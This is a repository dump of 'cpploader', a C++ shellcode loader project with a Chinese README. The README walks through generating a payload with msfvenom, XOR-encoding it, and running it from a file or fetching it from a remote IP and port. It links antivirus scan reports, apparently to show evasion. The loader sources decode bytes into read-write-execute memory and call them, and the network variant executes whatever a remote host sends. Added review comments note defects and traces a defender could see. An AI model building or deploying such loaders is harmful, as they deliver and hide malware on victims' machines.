├── README.md ├── cppencoder ├── cppencoder.cpp ├── cppencoder.vcxproj ├── cppencoder.vcxproj.filters └── cppencoder.vcxproj.user ├── cpploader.sln ├── cpploader ├── cpploader.cpp ├── cpploader.vcxproj ├── cpploader.vcxproj.filters └── cpploader.vcxproj.user └── cppnetloader ├── cppnetloader.cpp ├── cppnetloader.vcxproj ├── cppnetloader.vcxproj.filters └── cppnetloader.vcxproj.user /README.md: -------------------------------------------------------------------------------- 1 | # cpploader 2 | 3 | shellcode 内存加载器 C++编写. 4 | 5 | ## usage 6 | 7 | 生成 payload 8 | 9 | ``` 10 | msfvenom -p windows/exec CMD=calc.exe -f raw -o calc.bin 11 | ``` 12 | 13 | 加密 payload (默认 xor) 14 | 15 | ``` 16 | cppencoder.exe calc.bin enc.bin 17 | ``` 18 | 19 | `cpploader` 本地执行. 20 | 21 | ``` 22 | cpploader.exe enc.bin 23 | ``` 24 | 25 | `cppnetloader` 网络执行. 26 | 27 | ``` 28 | cppnetloader.exe 192.168.1.1 5555 29 | ``` 30 | 31 | ## report 32 | 33 | 在线杀软扫描报告. 34 | 35 | `cpploader` 36 | 37 | [VirScan](http://r.virscan.org/language/zh-cn/report/d968bcfa2e2d9e1e29bf45c95c51f60f) 38 | 39 | [VirusTotal](https://www.virustotal.com/gui/file/a56d0da8784f1ec01c354e7a0cfd2d004b36b509c266d344b25b2c5e7d458066/detection) 40 | 41 | `cppnetloader` 42 | 43 | [VirScan](http://r.virscan.org/language/zh-cn/report/092783011de845c8595b0d1ce5b56b8e) 44 | 45 | [VirusTotal](https://www.virustotal.com/gui/file/992011c67059117a832b3e6cf7c16226046d42673f72d90cbf28aa18ab5a0ee5/detection) 46 | 47 | # other 48 | 49 | [C++ ShellCode 加载器](https://exp10it.cn/2019/08/c-shellcode-%E5%8A%A0%E8%BD%BD%E5%99%A8/) 50 | 51 | 编码/加密方式可自行发挥. 52 | 53 | 更改 vs 编译选项缩小体积. 54 | 55 | 自己写效果更好. 
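56 | 57 | 58 | -------------------------------------------------------------------------------- /cppencoder/cppencoder.cpp: --------------------------------------------------------------------------------
// NOTE(review): the two header names were stripped by the page extraction;
// <windows.h> and <iostream> are reconstructed from the APIs used below.
// Confirm against the repository.
#include <windows.h>
#include <iostream>

/// @brief XORs every byte of a small file with the constant 'a' and writes
///        the result to a second file.
///
/// This is a fixed-key, single-byte XOR: it is an encoding, not encryption.
/// Anyone holding the output recovers the input by XORing with the same byte,
/// so the transform hides content from naive byte-pattern matching only.
///
/// @param inFilename  Path of the file to read (ANSI string).
/// @param outFilename Path of the file to create or overwrite (ANSI string).
///
/// The working buffer is 4096 bytes. Inputs larger than that are rejected;
/// the previous code passed the raw file size to ReadFile and could write
/// past the end of the stack buffer. Failures are reported on stderr and the
/// function returns without creating the output file.
void encode(LPCSTR inFilename, LPCSTR outFilename)
{
    char buf[4096];

    // The parameters are LPCSTR, so call the ANSI entry point explicitly. The
    // generic CreateFile macro resolves to the wide-character variant when
    // UNICODE is defined, which would not accept these arguments.
    HANDLE inFile = CreateFileA(inFilename, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (inFile == INVALID_HANDLE_VALUE) {
        std::cerr << "cppencoder: cannot open input file" << std::endl;
        return;
    }

    const DWORD size = GetFileSize(inFile, NULL);
    if (size == INVALID_FILE_SIZE || size > sizeof(buf)) {
        // Refuse rather than overflow buf.
        std::cerr << "cppencoder: input is unreadable or larger than 4096 bytes" << std::endl;
        CloseHandle(inFile);
        return;
    }

    DWORD bytesRead = 0;
    const BOOL readOk = ReadFile(inFile, buf, size, &bytesRead, NULL);
    CloseHandle(inFile);
    if (!readOk || bytesRead != size) {
        std::cerr << "cppencoder: short or failed read" << std::endl;
        return;
    }

    // Transform only the bytes that were actually read. The output is the same
    // as before for valid inputs, and uninitialised stack bytes are no longer
    // touched.
    for (DWORD i = 0; i != bytesRead; ++i) {
        buf[i] = buf[i] ^ 'a';
    }

    HANDLE outFile = CreateFileA(outFilename, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
    if (outFile == INVALID_HANDLE_VALUE) {
        std::cerr << "cppencoder: cannot create output file" << std::endl;
        return;
    }

    DWORD bytesWritten = 0;
    if (!WriteFile(outFile, buf, bytesRead, &bytesWritten, NULL) || bytesWritten != bytesRead) {
        std::cerr << "cppencoder: short or failed write" << std::endl;
    }
    CloseHandle(outFile);
}

/// Entry point: expects exactly two arguments (input path, output path) and
/// prints a usage line otherwise. Always returns 0, as before.
int main(int argc, char** argv) {
    if (argc != 3) {
        std::cout << "cppencoder.exe calc.bin enc.bin" << std::endl;
    }
    else {
        encode(argv[1], argv[2]);
    }
    return 0;
}
-------------------------------------------------------------------------------- /cppencoder/cppencoder.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283} 24 | Win32Proj 25 | cppencoder 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | false 75 | 76 | 77 | true 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | 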
Level3 90 | MinSpace 91 | true 92 | true 93 | true 94 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | MultiThreadedDLL 97 | Sync 98 | 99 | 100 | Console 101 | true 102 | true 103 | true 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | Level3 113 | Disabled 114 | true 115 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 116 | true 117 | 118 | 119 | Console 120 | true 121 | 122 | 123 | 124 | 125 | 126 | 127 | Level3 128 | Disabled 129 | true 130 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 131 | true 132 | 133 | 134 | Console 135 | true 136 | 137 | 138 | 139 | 140 | 141 | 142 | Level3 143 | MinSpace 144 | true 145 | true 146 | true 147 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 148 | true 149 | MultiThreadedDLL 150 | Sync 151 | 152 | 153 | Console 154 | true 155 | true 156 | true 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | -------------------------------------------------------------------------------- /cppencoder/cppencoder.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /cppencoder/cppencoder.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /cpploader.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 
16.0.29123.88 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cpploader", "cpploader\cpploader.vcxproj", "{705C4B3E-BE7C-4414-9372-9FB2D636DBC8}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cppencoder", "cppencoder\cppencoder.vcxproj", "{993DBEA1-D711-47A5-AA8A-5800A6DFA283}" 9 | EndProject 10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "cppnetloader", "cppnetloader\cppnetloader.vcxproj", "{D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}" 11 | EndProject 12 | Global 13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 14 | Debug|x64 = Debug|x64 15 | Debug|x86 = Debug|x86 16 | Release|x64 = Release|x64 17 | Release|x86 = Release|x86 18 | EndGlobalSection 19 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 20 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Debug|x64.ActiveCfg = Debug|x64 21 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Debug|x64.Build.0 = Debug|x64 22 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Debug|x86.ActiveCfg = Debug|Win32 23 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Debug|x86.Build.0 = Debug|Win32 24 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Release|x64.ActiveCfg = Release|x64 25 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Release|x64.Build.0 = Release|x64 26 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Release|x86.ActiveCfg = Release|Win32 27 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8}.Release|x86.Build.0 = Release|Win32 28 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Debug|x64.ActiveCfg = Debug|x64 29 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Debug|x64.Build.0 = Debug|x64 30 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Debug|x86.ActiveCfg = Debug|Win32 31 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Debug|x86.Build.0 = Debug|Win32 32 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Release|x64.ActiveCfg = Release|x64 33 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Release|x64.Build.0 = Release|x64 34 | {993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Release|x86.ActiveCfg = Release|Win32 35 | 
{993DBEA1-D711-47A5-AA8A-5800A6DFA283}.Release|x86.Build.0 = Release|Win32 36 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Debug|x64.ActiveCfg = Debug|x64 37 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Debug|x64.Build.0 = Debug|x64 38 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Debug|x86.ActiveCfg = Debug|Win32 39 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Debug|x86.Build.0 = Debug|Win32 40 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Release|x64.ActiveCfg = Release|x64 41 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Release|x64.Build.0 = Release|x64 42 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Release|x86.ActiveCfg = Release|Win32 43 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855}.Release|x86.Build.0 = Release|Win32 44 | EndGlobalSection 45 | GlobalSection(SolutionProperties) = preSolution 46 | HideSolutionNode = FALSE 47 | EndGlobalSection 48 | GlobalSection(ExtensibilityGlobals) = postSolution 49 | SolutionGuid = {7E2D591C-72B4-4A1E-9301-032BD51715B9} 50 | EndGlobalSection 51 | EndGlobal 52 | -------------------------------------------------------------------------------- /cpploader/cpploader.cpp: --------------------------------------------------------------------------------
#include  // header name stripped by the page extraction
#include  // header name stripped by the page extraction

#pragma comment(linker, "/INCREMENTAL:NO")

// Reads the file named by inFilename into a 4096-byte stack buffer, XORs the
// whole buffer with the constant 'a', copies all 4096 bytes into a freshly
// allocated read/write/execute region and calls that region as a function.
//
// What a defender can observe in this sequence: one VirtualAlloc request with
// PAGE_EXECUTE_READWRITE, a copy into the returned region, then an indirect
// call to its base address. The single-byte XOR only changes the bytes on
// disk. After the loop the decoded bytes sit in process memory in clear, both
// in buf and in the executable region.
//
// NOTE(review): defects visible in this block:
//  - no return value is checked (CreateFile, GetFileSize, ReadFile,
//    VirtualAlloc); memcpy runs even if the allocation failed;
//  - size comes straight from GetFileSize and is passed to ReadFile as the
//    byte count, so a file larger than 4096 bytes writes past the end of buf;
//  - inFile is never closed;
//  - the XOR loop and the memcpy cover all 4096 bytes, including bytes that
//    ReadFile never wrote (uninitialised stack contents).
void shellcode(LPCSTR inFilename)
{
    char buf[4096];
    HANDLE inFile = CreateFile(inFilename, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    int size = GetFileSize(inFile, NULL);  // stored in a signed int; not compared with sizeof(buf)
    DWORD bytesRead = 0;
    ReadFile(inFile, buf, size, &bytesRead, NULL);  // bytesRead is not used afterwards
    // Undo the encoder's transform: same constant key, applied to every slot of buf.
    for (int i = 0; i != sizeof(buf) / sizeof(buf[0]); i++) {
        buf[i] = buf[i] ^ 'a';
    }
    // The region is requested as writable and executable at the same time.
    LPVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, buf, sizeof(buf));
    // Cast the region's base address to a no-argument function pointer and call it.
    ((void(*)())Memory)();
}

// Entry point: expects exactly one argument (the encoded file) and prints a
// usage line otherwise. Always returns 0.
int main(int argc, char** argv) {
    if (argc != 2) {
        std::cout << "cpploader.exe enc.bin" << std::endl;
    }
    else {
        shellcode(argv[1]);
    }
    return 0;
}
-------------------------------------------------------------------------------- /cpploader/cpploader.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {705C4B3E-BE7C-4414-9372-9FB2D636DBC8} 24 | Win32Proj 25 | cpploader 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | true 75 | 76 | 77 | true 78 | 79 | 80 | false 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | Disabled 91 | true 92 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 93 | true 94 | 95 | 96 | Console 97 | true 98 | 99 | 100 | 101 | 102 | 103 | 104 | Level3 105 | Disabled 106 | true 107 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 108 | true 109 | 110 | 111 | Console 112 | true 113 | 114 | 115 | 116 | 117 | 118 | 119 | Level3 120 | MinSpace 121 | true 122 | true 123 | true 124 | 125 | 126 | true 127 | MultiThreadedDLL 128 | Sync 129 | 130 | 131 | Console 132 | true 133 | true 134 | true 135 | 136 | 137 | 138 | 139 | 140 | 141 | 142 | 143 | Level3 144 | MinSpace 145 | true 146 | true 147 | true 148 | 149 | 150 | true 151 | MultiThreadedDLL 152 | Sync 153 | 154 | 155 | Console 156 | true 157 | true 158 | true 159 | 160 | 161 | 162 | 163 | 164 | 165 | 166 | 167 | 168 | 169 | -------------------------------------------------------------------------------- /cpploader/cpploader.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | 
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /cpploader/cpploader.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /cppnetloader/cppnetloader.cpp: --------------------------------------------------------------------------------
#include  // header name stripped by the page extraction
#include  // header name stripped by the page extraction
#include  // header name stripped by the page extraction
#include  // header name stripped by the page extraction

#pragma comment(lib, "ws2_32.lib")
#pragma comment(linker, "/INCREMENTAL:NO")

// Opens a TCP connection to host:port, performs one recv of up to 4096 bytes
// into a stack buffer, XORs the whole buffer with the constant 'a', copies
// all 4096 bytes into a read/write/execute region and calls that region as a
// function. Returns 0 if the called code returns.
//
// What a defender can observe in this sequence: an outbound IPv4 TCP
// connection, followed in the same process by a VirtualAlloc request with
// PAGE_EXECUTE_READWRITE, a copy into the region and an indirect call to its
// base. The bytes travel over a plain socket with only the fixed-key XOR
// applied. Nothing in this block authenticates the peer or checks the
// integrity of what was received, so whoever answers on that address decides
// what the process executes.
//
// NOTE(review): defects visible in this block:
//  - no return value is checked (WSAStartup, socket, inet_pton, connect,
//    recv, VirtualAlloc); execution continues into the allocate/copy/call
//    steps even if the connection never succeeded;
//  - recv is called once and its result is discarded, so a short read leaves
//    the rest of buf uninitialised, yet all 4096 bytes are XORed and copied;
//  - addr is not zero-initialised before its fields are set;
//  - NULL is passed where recv expects an integer flags value.
int shellcode(PCSTR host, u_short port)
{
    char buf[4096];
    WORD version = MAKEWORD(2, 2);  // request Winsock 2.2
    WSADATA data;
    WSAStartup(version, &data);
    SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    sockaddr_in addr;
    addr.sin_family = AF_INET;
    addr.sin_port = htons(port);
    inet_pton(AF_INET, host, & addr.sin_addr);  // host is parsed as a dotted-quad IPv4 literal
    connect(sock, (sockaddr*)& addr, sizeof(addr));
    recv(sock, buf, 4096, NULL);  // single read; the byte count actually received is not kept
    closesocket(sock);
    WSACleanup();
    // Same constant-key transform as the encoder, applied to every slot of buf.
    for (int i = 0; i != sizeof(buf) / sizeof(buf[0]); i++) {
        buf[i] = buf[i] ^ 'a';
    }
    // The region is requested as writable and executable at the same time.
    LPVOID Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(Memory, buf, sizeof(buf));
    // Cast the region's base address to a no-argument function pointer and call it.
    ((void(*)())Memory)();
    return 0;
}

// Entry point: expects exactly two arguments (IPv4 address, port) and prints
// a usage line otherwise. Always returns 0.
// NOTE(review): the usage text names cpploader.exe although this file is
// cppnetloader.cpp. atoi's int result is passed as a u_short, so values
// outside 0..65535 are truncated, and non-numeric input becomes port 0.
int main(int argc, char** argv) {
    if (argc != 3) {
        std::cout << "cpploader.exe 192.168.1.1 5555" << std::endl;
    }
    else {
        shellcode(argv[1], atoi(argv[2]));
    }
    return 0;
}
-------------------------------------------------------------------------------- /cppnetloader/cppnetloader.vcxproj: 
-------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | {D2CDC2D3-4BA5-4D53-B219-6BEDAC4A2855} 24 | Win32Proj 25 | cppnetloader 26 | 10.0 27 | 28 | 29 | 30 | Application 31 | true 32 | v142 33 | Unicode 34 | 35 | 36 | Application 37 | false 38 | v142 39 | true 40 | MultiByte 41 | 42 | 43 | Application 44 | true 45 | v142 46 | Unicode 47 | 48 | 49 | Application 50 | false 51 | v142 52 | true 53 | MultiByte 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | false 75 | 76 | 77 | true 78 | 79 | 80 | true 81 | 82 | 83 | false 84 | 85 | 86 | 87 | 88 | 89 | Level3 90 | MaxSpeed 91 | true 92 | true 93 | true 94 | _WINSOCK_DEPRECATED_NO_WARNINGS 95 | true 96 | 97 | 98 | Console 99 | true 100 | true 101 | true 102 | 103 | 104 | 105 | 106 | 107 | 108 | Level3 109 | Disabled 110 | true 111 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 112 | true 113 | 114 | 115 | Console 116 | true 117 | 118 | 119 | 120 | 121 | 122 | 123 | Level3 124 | Disabled 125 | true 126 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 127 | true 128 | 129 | 130 | Console 131 | true 132 | 133 | 134 | 135 | 136 | 137 | 138 | Level3 139 | MaxSpeed 140 | true 141 | true 142 | true 143 | _WINSOCK_DEPRECATED_NO_WARNINGS 144 | true 145 | 146 | 147 | Console 148 | true 149 | true 150 | true 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | -------------------------------------------------------------------------------- /cppnetloader/cppnetloader.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd 11 | 12 | 13 | 
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /cppnetloader/cppnetloader.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | --------------------------------------------------------------------------------